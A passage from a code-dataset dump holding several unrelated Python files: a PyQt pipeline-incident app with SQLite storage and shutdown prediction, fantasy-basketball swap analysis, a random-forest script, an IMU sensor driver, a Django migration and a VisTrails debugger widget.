item)\r\n\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget_2.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget_2.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n self.tableWidget_2.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget_2.setEditTriggers(QTableWidget.NoEditTriggers)\r\n self.tableWidget_2.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget_2.verticalHeader().setVisible(False)\r\n self.tableWidget_2.resizeRowsToContents()\r\n self.tableWidget_2.resizeColumnsToContents()\r\n\r\n # Retrieve data from the database table\r\n cursor.execute(\"SELECT * FROM Operators\")\r\n df = cursor.fetchall()\r\n\r\n # Set the number of rows and columns in the table\r\n self.tableWidget_3.setRowCount(len(df))\r\n self.tableWidget_3.setColumnCount(len(df[0])) # Assuming all rows have the same number of columns\r\n\r\n # Add data to the table\r\n for i, row in enumerate(df):\r\n for j, value in enumerate(row):\r\n item = QTableWidgetItem(str(value))\r\n self.tableWidget_3.setItem(i, j, item)\r\n\r\n # Set table properties\r\n header_labels = [description[0] for description in cursor.description]\r\n self.tableWidget_3.setHorizontalHeaderLabels(header_labels)\r\n self.tableWidget_3.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\r\n self.tableWidget_3.setSizeAdjustPolicy(QTableWidget.AdjustToContents)\r\n self.tableWidget_3.setEditTriggers(QTableWidget.NoEditTriggers)\r\n 
self.tableWidget_3.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\r\n self.tableWidget_3.verticalHeader().setVisible(False)\r\n self.tableWidget_3.resizeRowsToContents()\r\n self.tableWidget_3.resizeColumnsToContents()\r\n\r\n # Close the database connection\r\n conn.close()\r\n \r\n \r\n def add_value(self):\r\n # Connect to the database\r\n db = QSqlDatabase.addDatabase(\"QSQLITE\")\r\n db.setDatabaseName(resource_path(\"spdb.db\")) # Replace with the actual database file name\r\n \r\n if not db.open():\r\n print(\"Failed to connect to the database.\")\r\n return\r\n\r\n # Get input values\r\n AccidentDateTime = self.dateTimeEdit.dateTime().toString(\"yyyy-MM-dd HH:mm:ss\")\r\n PipelineLocation = self.comboBox_2.currentText()\r\n PipelineFacilityName = self.lineEdit_8.text()\r\n OpertorName = self.comboBox_19.currentText()\r\n PipelineType = self.comboBox.currentText()\r\n LiquidType = self.comboBox_3.currentText()\r\n AccidentState = self.comboBox_14.currentText()\r\n AccidentLatitude = self.lineEdit.text()\r\n AccidentLongitude = self.lineEdit_2.text()\r\n CauseCategory = self.comboBox_4.currentText()\r\n CauseSubcategory = self.comboBox_15.currentText()\r\n UnintentionalRelease = self.lineEdit_3.text()\r\n PipelineShutdown = self.comboBox_5.currentText()\r\n PropertyDamageCosts = self.lineEdit_4.text()\r\n LiquidIgnition = self.comboBox_16.currentText()\r\n LiquidExplosion = self.comboBox_17.currentText()\r\n\r\n# Check for empty fields\r\n if (\r\n not AccidentDateTime\r\n or not PipelineFacilityName\r\n or not OpertorName\r\n or not AccidentLatitude\r\n or not AccidentLongitude\r\n or not UnintentionalRelease\r\n or not PropertyDamageCosts\r\n ):\r\n QMessageBox.warning(\r\n self,\r\n \"Empty Fields\",\r\n \"Please fill in all the required fields.\",\r\n QMessageBox.Ok,\r\n )\r\n return\r\n\r\n # Convert input values to float\r\n try:\r\n AccidentLatitude = float(AccidentLatitude)\r\n AccidentLongitude = float(AccidentLongitude)\r\n UnintentionalRelease = float(UnintentionalRelease)\r\n PropertyDamageCosts = float(PropertyDamageCosts)\r\n except ValueError:\r\n QMessageBox.warning(\r\n self,\r\n \"Invalid Values\",\r\n \"Please enter valid numeric values for latitude, longitude, unintentional release, and property damage costs.\",\r\n QMessageBox.Ok,\r\n )\r\n return\r\n # Validate latitude and longitude\r\n if not self.is_valid_location(AccidentLatitude, AccidentLongitude):\r\n QMessageBox.warning(self, \"Invalid Location\", \"Invalid latitude and longitude. 
Please provide a location within the continental United States.\", QMessageBox.Ok)\r\n return\r\n #check for empty fields\r\n\r\n # Perform other necessary validations and error handling here\r\n # Retrieve the accident year\r\n accident_year = self.dateTimeEdit.date().year()\r\n # Generate report number\r\n count_query = QSqlQuery()\r\n count_query.prepare(\"SELECT MAX(\\\"Report Number\\\") FROM Incidents\")\r\n count_query.exec_()\r\n count_query.next()\r\n last_report_number = count_query.value(0)\r\n if last_report_number is not None:\r\n last_report_number_str = str(last_report_number)\r\n last_report_number_numeric = int(last_report_number_str[len(str(accident_year)):])\r\n count = last_report_number_numeric + 1\r\n else:\r\n count = 1\r\n reportnumber = int(f\"{accident_year}{count:04d}\")\r\n\r\n\r\n\r\n # Check if the entered Facility Name exists in the Pipelines table\r\n facility_name = PipelineFacilityName.strip()\r\n pipeline_query = QSqlQuery()\r\n pipeline_query.prepare(\"SELECT COUNT(*) FROM Pipelines WHERE \\\"Pipeline/Facility Name\\\" = ?\")\r\n pipeline_query.addBindValue(facility_name)\r\n pipeline_query.exec_()\r\n pipeline_query.next()\r\n count = pipeline_query.value(0)\r\n\r\n if count == 0:\r\n QMessageBox.warning(self, \"Invalid Facility Name\", \"Please enter a valid Facility Name.\")\r\n return\r\n\r\n\r\n # Prepare the SQL query\r\n query = QSqlQuery()\r\n operatorQuery = QSqlQuery()\r\n operatorQuery.prepare(\"SELECT \\\"Operator ID\\\" FROM Operators WHERE \\\"Operator Name\\\" = ?\")\r\n operatorQuery.addBindValue(OpertorName)\r\n operatorQuery.exec()\r\n operatorQuery.next()\r\n operatorId = operatorQuery.value(0)\r\n query.prepare(\"INSERT INTO Incidents (\\\"Report Number\\\", \\\"Accident Date/Time\\\", \\\"Operator ID\\\", \\\"Pipeline/Facility Name\\\", \\\"Pipeline Type\\\", \\\"Liquid Type\\\", \\\"Accident State\\\", \\\"Accident Latitude\\\", \\\"Accident Longitude\\\", \\\"Cause Category\\\", \\\"Cause Subcategory\\\", \\\"Unintentional Release (Barrels)\\\", \\\"Liquid Ignition\\\", \\\"Liquid Explosion\\\", \\\"Pipeline Shutdown\\\") VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\")\r\n query.addBindValue(reportnumber)\r\n query.addBindValue(AccidentDateTime)\r\n query.addBindValue(operatorId)\r\n query.addBindValue(PipelineFacilityName)\r\n query.addBindValue(PipelineType)\r\n query.addBindValue(LiquidType)\r\n query.addBindValue(AccidentState)\r\n query.addBindValue(AccidentLatitude)\r\n query.addBindValue(AccidentLongitude)\r\n query.addBindValue(CauseCategory)\r\n query.addBindValue(CauseSubcategory)\r\n query.addBindValue(UnintentionalRelease)\r\n query.addBindValue(LiquidIgnition)\r\n query.addBindValue(LiquidExplosion)\r\n query.addBindValue(PipelineShutdown)\r\n \r\n # Execute the SQL query\r\n if not query.exec_():\r\n print(\"Failed to insert values into the table.\")\r\n print(query.lastError().text())\r\n db.rollback()\r\n else:\r\n db.commit()\r\n QMessageBox.information(self, \"Success\", \"The incident was successfully added.\")\r\n\r\n # Close the database connection\r\n db.close()\r\n\r\n # Clear the input fields\r\n self.clear_fields()\r\n\r\n def clear_fields(self):\r\n self.dateTimeEdit.setDateTime(QDateTime.currentDateTime())\r\n self.comboBox_2.setCurrentIndex(0)\r\n self.lineEdit_8.clear()\r\n self.comboBox_19.setCurrentIndex(0)\r\n self.comboBox.setCurrentIndex(0)\r\n self.comboBox_3.setCurrentIndex(0)\r\n self.comboBox_14.setCurrentIndex(0)\r\n self.lineEdit.clear()\r\n self.lineEdit_2.clear()\r\n 
self.comboBox_4.setCurrentIndex(0)\r\n self.comboBox_15.setCurrentIndex(0)\r\n self.lineEdit_3.clear()\r\n self.comboBox_5.setCurrentIndex(0)\r\n self.lineEdit_4.clear()\r\n self.comboBox_16.setCurrentIndex(0)\r\n self.comboBox_17.setCurrentIndex(0)\r\n def is_valid_location(self, latitude, longitude):\r\n # Define the valid range for latitude and longitude within the continental United States\r\n valid_latitude_range = (24.396308, 49.384358)\r\n valid_longitude_range = (-125.000000, -66.934570)\r\n\r\n # Check if latitude and longitude values are within the valid range\r\n if latitude >= valid_latitude_range[0] and latitude <= valid_latitude_range[1] and \\\r\n longitude >= valid_longitude_range[0] and longitude <= valid_longitude_range[1]:\r\n return True\r\n else:\r\n return False \r\n def search_table(self):\r\n search_text = self.lineEdit_5.text().lower()\r\n\r\n for row in range(self.tableWidget.rowCount()):\r\n row_match = False\r\n for column in range(self.tableWidget.columnCount()):\r\n item = self.tableWidget.item(row, column)\r\n if item.text().lower().startswith(search_text):\r\n row_match = True\r\n item.setBackground(QBrush(QColor(255, 255, 153))) # Highlight the cell background color\r\n else:\r\n item.setBackground(QBrush(Qt.NoBrush)) # Reset the cell background color\r\n\r\n self.tableWidget.setRowHidden(row, not row_match) # Show/hide the row based on the match\r\n \r\n\r\n def predict_shutdown(self):\r\n \r\n accident_datetime =self.dateTimeEdit_2.dateTime().toString(\"yyyy-MM-dd HH:mm:ss\")\r\n pipeline_location = self.comboBox_6.currentText()\r\n pipeline_type = self.comboBox_7.currentText()\r\n liquid_type = self.comboBox_8.currentText()\r\n accident_state=self.comboBox_10.currentText()\r\n accident_latitude = self.lineEdit_6.text()\r\n accident_longitude =self.lineEdit_7.text()\r\n cause_category = self.comboBox_9.currentText()\r\n cause_subcategory=self.comboBox_11.currentText()\r\n liquid_ignition=self.comboBox_12.currentText()\r\n liquid_explosion=self.comboBox_13.currentText()\r\n if (\r\n not accident_latitude\r\n or not accident_longitude\r\n \r\n ):\r\n QMessageBox.warning(\r\n self,\r\n \"Empty Fields\",\r\n \"Please fill in all the required fields.\",\r\n QMessageBox.Ok,\r\n )\r\n return\r\n accident_latitude = float(accident_latitude)\r\n accident_longitude = float(accident_longitude) \r\n print(accident_datetime)\r\n print(pipeline_location)\r\n print(pipeline_type)\r\n print(liquid_type)\r\n print(accident_latitude)\r\n print(accident_longitude)\r\n print(cause_category)\r\n \r\n if not self.is_valid_location(accident_latitude, accident_longitude):\r\n QMessageBox.warning(self, \"Invalid Location\", \"Invalid latitude and longitude. 
Please provide a location within the continental United States.\", QMessageBox.Ok)\r\n return\r\n # Load the trained model\r\n with open('model.pkl', 'rb') as file:\r\n model = pickle.load(file)\r\n \r\n # Create a DataFrame with the input values\r\n input_data = pd.DataFrame({\r\n 'Pipeline Location': [pipeline_location],\r\n 'Pipeline Type': [pipeline_type],\r\n 'Liquid Type': [liquid_type],\r\n 'Accident Latitude': [accident_latitude],\r\n 'Accident Longitude': [accident_longitude],\r\n 'Cause Category': [cause_category]\r\n})\r\n \r\n column_names = [ 'Accident Latitude', 'Accident Longitude', 'OFFHORE', 'ONSHORE', 'ABOVEGROUND', 'TANK', 'TRANSITION AREA', 'UNDERGROUND', 'ALL OTHER CAUSES', 'CORROSION', 'EXCAVATION DAMAGE', 'INCORRECT OPERATION', 'MATERIAL/WELD/EQUIP FAILURE', 'NATURAL FORCE DAMAGE', 'OTHER OUTSIDE FORCE DAMAGE', 'BIOFUEL / ALTERNATIVE FUEL(INCLUDING ETHANOL BLENDS)', 'CO2 (CARBON DIOXIDE)', 'CRUDE OIL', 'HVL OR OTHER FLAMMABLE OR TOXIC FLUID, GAS', 'REFINED AND/OR PETROLEUM PRODUCT (NON-HVL), LIQUID']\r\n\r\n\r\n categorical_cols = ['Pipeline Location', 'Pipeline Type', 'Liquid Type', 'Cause Category']\r\n# One-hot encode the categorical columns in the input data without prefix\r\n input_data_encoded = pd.get_dummies(input_data, columns=categorical_cols, prefix='', prefix_sep='')\r\n\r\n# Get the feature names after one-hot encoding\r\n feature_names = input_data_encoded.columns.tolist()\r\n\r\n# Make sure the input data columns are in the same order as the trained model's features\r\n input_data_encoded = input_data_encoded.reindex(columns=column_names, fill_value=0)\r\n\r\n# Add missing columns if any (i.e., if the input data has fewer categories than the trained model)\r\n missing_cols = set(column_names) - set(input_data_encoded.columns)\r\n for col in missing_cols:\r\n input_data_encoded[col] = 0\r\n print(input_data_encoded.to_string(index=False))\r\n# Make the prediction\r\n prediction = model.predict(input_data_encoded)\r\n\r\n print(prediction[0])\r\n # Display the prediction\r\n if prediction[0] == 0 :\r\n self.label_22.setText(\"NO\")\r\n predicted_value=\"NO\"\r\n else:\r\n self.label_22.setText(\"YES\")\r\n predicted_value=\"YES\"\r\n # Connect to the database\r\n conn = sqlite3.connect('spdb.db')\r\n cursor = conn.cursor()\r\n \r\n # Get the total number of rows in the \"Prediction\" table\r\n # cursor.execute(\"SELECT COUNT(*) FROM Prediction\")\r\n # result = cursor.fetchone()\r\n # num_predictions = result[0] + 1\r\n current_date = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\r\n\r\n insert_query = \"INSERT INTO Prediction (\\\"Accident Date/Time\\\", \\\"Pipeline Type\\\", \\\"Liquid Type\\\", \\\"Accident State\\\", \\\"Accident Latitude\\\", \\\"Accident Longitude\\\", \\\"Cause Category\\\", \\\"Cause Subcategory\\\", \\\"Liquid Ignition\\\", \\\"Liquid Explosion\\\", \\\"Predicted Shutdown\\\", \\\"Prediction Date/Time\\\") VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\"\r\n\r\n values = (accident_datetime, pipeline_type, liquid_type, accident_state, accident_latitude, accident_longitude, cause_category, cause_subcategory, liquid_ignition, liquid_explosion, predicted_value, current_date)\r\n\r\n cursor.execute(insert_query, values)\r\n \r\n\r\n conn.commit()\r\n conn.close()\r\n self.dateTimeEdit_2.setDateTime(QtCore.QDateTime.currentDateTime()) # Set the date/time to current date/time\r\n self.comboBox_6.setCurrentIndex(0) # Set the pipeline location to the default value (index 0)\r\n self.comboBox_7.setCurrentIndex(0) # Set the 
pipeline type to the default value (index 0)\r\n self.comboBox_8.setCurrentIndex(0) # Set the liquid type to the default value (index 0)\r\n self.comboBox_10.setCurrentIndex(0) # Set the accident state to the default value (index 0)\r\n self.lineEdit_6.clear() # Clear the accident latitude input\r\n self.lineEdit_7.clear() # Clear the accident longitude input\r\n self.comboBox_9.setCurrentIndex(0) # Set the cause category to the default value (index 0)\r\n self.comboBox_11.setCurrentIndex(0) # Set the cause subcategory to the default value (index 0)\r\n self.comboBox_12.setCurrentIndex(0) # Set the liquid ignition to the default value (index 0)\r\n self.comboBox_13.setCurrentIndex(0)\r\n \r\nif __name__ == '__main__':\r\n app = QtWidgets.QApplication([])\r\n window1 = Window1()\r\n window1.show()\r\n app.exec_()\r\n","repo_name":"emerald-zzz/decision-support-system","sub_path":"applicationv01.py","file_name":"applicationv01.py","file_ext":"py","file_size_in_byte":73678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"33584595025","text":"import os\nimport pandas as pd\n\ndef aggregatePlayerStats(data, player_list):\n\n team_data = data[data['player'].isin(player_list)] #subset data in the player list\n sum_data = team_data[['fga', '3pa', '2pa', 'fta',\n 'orb', 'drb', 'trb', 'ast', 'stl', 'blk', 'tov', 'pf', 'pts']].sum()\n avg_data = team_data[['2p%', '3p%', 'fg%', 'ft%', 'efg%', 'age', 'per', '3par',\n 'ftr', 'orb%', 'drb%', 'trb%', 'ast%', 'stl%', 'blk%', 'tov%',\n 'usg%', 'ows', 'dws', 'ws', 'ws/48', 'obpm', 'dbpm', 'bpm', 'vorp']].mean()\n final = pd.DataFrame(pd.concat([sum_data, avg_data], axis=0)).transpose()\n return final\n\ndef getZScores(player_list, player_data, season_average_data):\n \n #season_average_data must be for the season in question... 
subset before hand\\\n team_stats = aggregatePlayerStats(player_data, player_list)\n \n z_scores = list()\n #get mean/standard deviation for stats of specific season\n season_data = season_average_data.drop('season', axis=1) \n #find the columns that intersect between two data sets to iterate over\n columns = team_stats.columns[team_stats.columns.isin(season_average_data.columns)]\n \n for stat in columns:\n if stat not in ['tov', 'pf']: #if not turnovers or personal fouls\n # z = (X - X_bar) / SD\n z = (team_stats[stat][0] - season_data.loc['mean', stat])/season_data.loc['sd', stat]\n else:\n # z = -(X - X_bar) / SD\n z = -(team_stats[stat][0] - season_data.loc['mean', stat])/season_data.loc['sd', stat]\n \n z_scores.append(z)\n \n # Put it all together in a single DataFrame\n z_scores = pd.DataFrame(z_scores, columns = ['z_score'], index = columns)\n z_scores = z_scores.sort_values('z_score', ascending = True)\n return z_scores\n\ndef teamAssessment(data, bottom_n=3, top_n=3):\n \n strengths = list(data.tail(top_n).index)\n strengths.reverse() #reverse order\n weaknesses = list(data.head(bottom_n).index)\n \n results = {'weaknesses': \"Your weakest {} areas are (in order): {}\".format(str(bottom_n), str(weaknesses)),\n 'strengths': \"Your strongest {} areas are (in order): {}\".format(str(top_n), str(strengths))}\n \n return(results)\n\ndef salaryCap(player_list, salary_data, max_percentage):\n \n cap_total = 94.14 #hard coding for 2016\n cap_starters = cap_total * (max_percentage/100)\n salary = (salary_data[salary_data['player'].isin(player_list)]['salary'].sum(axis=0))/1000000\n \n if salary > cap_starters:\n return {'total_salary': salary, 'starter_cap': cap_starters, 'over_cap': True}\n else:\n return {'total_salary': salary, 'starter_cap': cap_starters, 'over_cap': False}\n\ndef assessPlayerSwaps(player_list, player_data, season_average_data, salary_data, salary_cap):\n \n ###Issue: this returns nothing right now if there is no way to get under the salary cap given the players\n\n potential_swaps = pd.DataFrame() #empty data frame\n \n og_team_stats = aggregatePlayerStats(player_data, player_list) #get the average stats \n og_z_score = getZScores(player_list, player_data, season_average_data) #get z-score for each team stat\n og_cum_z_score = og_z_score.sum()[0] #get cumulative z score\n \n for player_new in player_data['player']:\n for player_og in player_list: #could add check here for whether player input is already on team\n new_player_list = [player_new if x == player_og else x for x in player_list] #create new player list\n\n salary = salaryCap(new_player_list, salary_data, 80)\n\n if salary['over_cap'] == True:\n continue\n\n new_team_stats = aggregatePlayerStats(player_data, new_player_list) #find stats for new team\n new_z_score = getZScores(new_player_list, player_data, season_average_data) #find z scores for new team\n new_cum_z_score = new_z_score.sum()[0] #find cumulative z score for new team\n\n cum_z_score_net_change = new_cum_z_score - og_cum_z_score #find net change in z score\n per_stat_diff = new_z_score - og_z_score #find per stat difference \n stats_improved_count = len(per_stat_diff[per_stat_diff['z_score'] > 0]) #how many stats improved\n \n #Assign variables\n new_team_stats['player_og'] = player_og \n new_team_stats['player_new'] = player_new\n new_team_stats['cum_z_score_og'] = og_cum_z_score\n new_team_stats['cum_z_score_new'] = new_cum_z_score\n new_team_stats['cum_z_score_net_change'] = cum_z_score_net_change\n new_team_stats['stats_improved_count'] = 
stats_improved_count\n \n #Concatenate with final df\n potential_swaps = pd.concat([potential_swaps, new_team_stats], axis=0)\n \n return(potential_swaps) #return results of all potential swaps.\n\ndef recommendPlayer(player_list, player_swap_data, return_new_team_list=False):\n best_swap = player_swap_data[player_swap_data['cum_z_score_net_change'] ==\n max(player_swap_data['cum_z_score_net_change'])]\n \n if return_new_team_list == False:\n \tfinal = \"You should drop {} and add {}, he should help the team in {} statistical categories.\".format(\n \tbest_swap['player_og'][0], best_swap['player_new'][0], best_swap['stats_improved_count'][0])\n else:\n \tfinal = [best_swap['player_new'][0] if x == best_swap['player_og'][0] else x for x in player_list]\n \n return(final)","repo_name":"vikdad1/fantasy_basketball","sub_path":"app/functions/playerSwap.py","file_name":"playerSwap.py","file_ext":"py","file_size_in_byte":5573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27400182741","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nCreated on Sun Sep 16 17:32:29 2018\r\n\r\n@author: 刘雪晴\r\n\"\"\"\r\n\r\n#1. Load the datasets\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.cross_validation import KFold\r\n \r\ntrainX=pd.read_csv('trainx.csv')\r\ntrainY=pd.read_csv('trainy.csv')\r\ntestX=pd.read_csv('testx.csv')\r\n\r\n#2. Impute missing values in trainX and testX\r\nfrom sklearn import preprocessing\r\npre=preprocessing.Imputer(missing_values='NaN')\r\n#fit_transform fits the imputer to the data, then transforms it\r\ntrainX=pre.fit_transform(trainX)\r\ntestX=pre.fit_transform(testX)\r\n\r\n\r\n#3. K-fold cross-validation: split into training and test sets\r\nX =np.array(trainX)\r\nY =np.array(trainY)\r\n\r\nkf = KFold(X.shape[0], n_folds=20)\r\nfor train_index, test_index in kf:\r\n X_train, X_test = X[train_index], X[test_index]\r\n Y_train, Y_test = Y[train_index], Y[test_index]\r\n \r\n# Use a random forest\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nalg = RandomForestClassifier(random_state=1,n_estimators=100)\r\nalg.fit(X_train, Y_train)\r\npredictions = alg.predict(X_test)\r\nprint('Accuracy:',alg.score(X_test, Y_test))\r\n","repo_name":"liuxueqing1023/compete","sub_path":"竞赛一/dataset/exam1.py","file_name":"exam1.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"8217399999","text":"class calculator:\n num = 100\n\n def __init__(self, a, b):\n self.firstnumber = a\n self.secondnumber = b\n\n def getdata(self):\n print(\"It is a method in a class\")\n\n def summation(self):\n return self.firstnumber + self.secondnumber + calculator.num\n\n\nobj = calculator(2,3)\nobj.getdata()\nprint(obj.summation())\n\n\nobj1 = calculator(4, 5)\nobj1.getdata()\nprint(obj1.summation())","repo_name":"harsha-dendi/Py-OOPS","sub_path":"oops.py","file_name":"oops.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24841037793","text":"from typing import Union, Optional\n\nimport numpy as np\n\n\ndef proportion(\n x1: Union[np.float32, np.ndarray],\n x2: Union[np.float32, np.ndarray],\n y1: Union[np.float32, np.ndarray],\n y2: Union[np.float32, np.ndarray],\n *,\n solve_for: Optional[str] = None\n) -> None:\n \"\"\"Solves for whichever of `[x1, x2, y1, y2]` is all `zeros`.\n\n This is the implementation of the **arithmetic proportion algorithm** that\n solves for either the numerator or the denominator from either side 
given the\n other values.\n\n .. math::\n\n \\\\dfrac{x_{1}}{y_{1}} = \\\\dfrac{x_{2}}{y_{2}}\n\n This function modifies the values of the `zero` vector in-place.\n\n .. note::\n\n If more than one of the vectors could be the `zero_like` numpy vector,\n you must specify explicitly which variable the function must solve for.\n Otherwise, the first variable found to be `zero` is the one solved for.\n\n The order in which the algorithm decides which variable to solve for is:\n * `x1`\n * `x2`\n * `y1`\n * `y2`\n\n Args:\n x1: NumPy vector for the left side numerator.\n x2: NumPy vector for the right side numerator.\n y1: NumPy vector for the left side denominator.\n y2: NumPy vector for the right side denominator.\n\n Raises:\n ValueError: If none of `[x1, x2, y1, y2]` is all `zeros`.\n ZeroDivisionError: If the denominator in the final equation is `zero`.\n\n Examples:\n\n >>> # Example 1: Solve for x1 when x2, y1, and y2 are known\n >>> x1 = np.zeros(3)\n >>> x2 = np.array([3.0, 4.0, 5.0])\n >>> y1 = np.array([6.0, 7.0, 8.0])\n >>> y2 = np.array([9.0, 10.0, 11.0])\n >>> proportion(x1, x2, y1, y2, solve_for='x1')\n >>> x1\n ... array([2., 2.8, 3.63636364])\n \"\"\"\n if solve_for is None:\n if np.all(x1 == 0):\n solve_for = 'x1'\n elif np.all(x2 == 0):\n solve_for = 'x2'\n elif np.all(y1 == 0):\n solve_for = 'y1'\n elif np.all(y2 == 0):\n solve_for = 'y2'\n\n if solve_for is None:\n raise ValueError(\n (\n 'At least one numerator or denominator must be all zeros from either side to'\n ' calculate the proportion.'\n )\n )\n\n if solve_for == 'x1':\n if np.any(y2 == 0):\n raise ZeroDivisionError('The denominator `y2` cannot be zero.')\n x1[...] = np.divide(np.multiply(x2, y1), y2)\n elif solve_for == 'x2':\n if np.any(y1 == 0):\n raise ZeroDivisionError('The denominator `y1` cannot be zero.')\n x2[...] = np.divide(np.multiply(x1, y2), y1)\n elif solve_for == 'y1':\n if np.any(x2 == 0):\n raise ZeroDivisionError('The denominator `x2` cannot be zero.')\n y1[...] = np.divide(np.multiply(x1, y2), x2)\n elif solve_for == 'y2':\n if np.any(x1 == 0):\n raise ZeroDivisionError('The denominator `x1` cannot be zero.')\n y2[...] 
= np.divide(np.multiply(x2, y1), x1)\n","repo_name":"Rishabh-Dhami/ai","sub_path":"ai/mathematical_functions/arithmetic_operations.py","file_name":"arithmetic_operations.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"13032368190","text":"from typing import List\nfrom math import log2\n\nfrom treehopper.api import I2C\nfrom treehopper.libraries import SMBusDevice\nfrom treehopper.libraries.sensors.inertial.mpu6050_registers import Mpu6050Registers\nfrom treehopper.libraries.sensors.inertial import Accelerometer, Gyroscope\nfrom treehopper.libraries.sensors.temperature.temperature_sensor import TemperatureSensor\nfrom treehopper.libraries.smbus_register_manager_adapter import SMBusRegisterManagerAdapter\n\n\nclass Mpu6050(Accelerometer, Gyroscope, TemperatureSensor):\n \"\"\"Invensense MPU-6050 6-axis IMU\"\"\"\n @staticmethod\n def probe(i2c: I2C, include_mpu9250: bool) -> List['Mpu6050']:\n devs = [] # type: List['Mpu6050']\n try:\n dev = SMBusDevice(0x68, i2c, 100)\n who_am_i = dev.read_byte_data(0x75)\n if who_am_i == 0x68 or (who_am_i == 0x71 and include_mpu9250):\n devs.append(Mpu6050(i2c, False))\n except RuntimeError:\n pass\n\n try:\n dev = SMBusDevice(0x69, i2c, 100)\n who_am_i = dev.read_byte_data(0x75)\n if who_am_i == 0x68 or (who_am_i == 0x71 and include_mpu9250):\n devs.append(Mpu6050(i2c, True))  # device responded at the alternate address 0x69\n except RuntimeError:\n pass\n\n return devs\n\n def __init__(self, i2c: I2C, alt_address=False, rate=100):\n super().__init__()\n self._dev = SMBusDevice((0x69 if alt_address else 0x68), i2c, rate)\n self._registers = Mpu6050Registers(SMBusRegisterManagerAdapter(self._dev))\n self._registers.powerMgmt1.reset = 1\n self._registers.powerMgmt1.write()\n self._registers.powerMgmt1.reset = 0\n self._registers.powerMgmt1.sleep = 0\n self._registers.powerMgmt1.write()\n self._registers.powerMgmt1.clockSel = 1\n self._registers.powerMgmt1.write()\n self._registers.configuration.dlpf = 3\n self._registers.configuration.write()\n self._registers.sampleRateDivider.value = 4\n self._registers.sampleRateDivider.write()\n self._registers.accelConfig2.read()\n self._registers.accelConfig2.accelFchoice = 0\n self._registers.accelConfig2.dlpfCfg = 3\n self._registers.accelConfig2.write()\n self.accel_scale = 2\n\n @property\n def accel_scale(self):\n return 2*pow(2, self._registers.accelConfig.accelScale)\n\n @accel_scale.setter\n def accel_scale(self, value: int):\n if value != 2 and value != 4 and value != 8 and value != 16:\n raise ValueError(\"Accelerometer scale must be 2, 4, 8, or 16\")\n self._registers.accelConfig.accelScale = int(log2(value)-1)\n self._registers.accelConfig.write()\n\n def update(self):\n self._registers.readRange(self._registers.accel_x, self._registers.gyro_z)\n self._accelerometer = [self._registers.accel_x.value * self.accel_scale / 32768.0,\n self._registers.accel_y.value * self.accel_scale / 32768.0,\n self._registers.accel_z.value * self.accel_scale / 32768.0]\n\n self._gyroscope = [self._registers.gyro_x.value,\n self._registers.gyro_y.value,\n self._registers.gyro_z.value]\n\n self._celsius = self._registers.temp.value / 333.87 + 21.0","repo_name":"treehopper-electronics/treehopper-sdk","sub_path":"Python/treehopper/libraries/sensors/inertial/mpu6050.py","file_name":"mpu6050.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"12814233467","text":"# -*- coding: utf-8 
-*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('student', '0010_remove_payment_user_id'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='payment',\r\n name='user_id',\r\n field=models.IntegerField(default=1),\r\n preserve_default=False,\r\n ),\r\n ]\r\n","repo_name":"asp3/StudentAccounts","sub_path":"student/migrations/0011_payment_user_id.py","file_name":"0011_payment_user_id.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"858288994","text":"from __future__ import division\n\nfrom PyQt4 import QtGui, QtCore\nfrom vistrails.core.modules.vistrails_module import ModuleError\nimport vistrails.core.system\nimport copy\nimport sys\nimport time\nimport os.path\nimport vistrails.gui.application\nfrom vistrails.core.interpreter.default import get_default_interpreter\nfrom vistrails.gui.vistrails_palette import QVistrailsPaletteInterface\n\n############################################################################\n\nclass QDebugger(QtGui.QWidget, QVistrailsPaletteInterface):\n \"\"\"\n This class provides a dockable interface to the debugger tree.\n \"\"\"\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent=parent)\n self.app = vistrails.gui.application.get_vistrails_application()\n self.inspector = QObjectInspector()\n layout = QtGui.QVBoxLayout()\n layout.setMargin(0)\n layout.setSpacing(0)\n layout.addWidget(self.inspector)\n self.setLayout(layout)\n # self.setTitleBarWidget(QtGui.QLabel(\"Debugger\"))\n self.setWindowTitle(\"Debugger\")\n self.controller = None\n self.vistrails_interpreter = get_default_interpreter()\n self.vistrails_interpreter.debugger = self\n\n def set_controller(self, c):\n \"\"\"\n set_controller(c) -> None\n Set the current vistrails controller to be used by the debugger\n \"\"\"\n self.controller = c\n self.update()\n\n def update_values(self):\n \"\"\"\n update_vals() -> None\n Update the debugger after an execution with any values that become\n available on its input ports.\n \"\"\"\n self.update(update_vals=True)\n \n def update(self, update_vals=False):\n \"\"\"\n update(update_vals=False) -> None\n Update the debugger. 
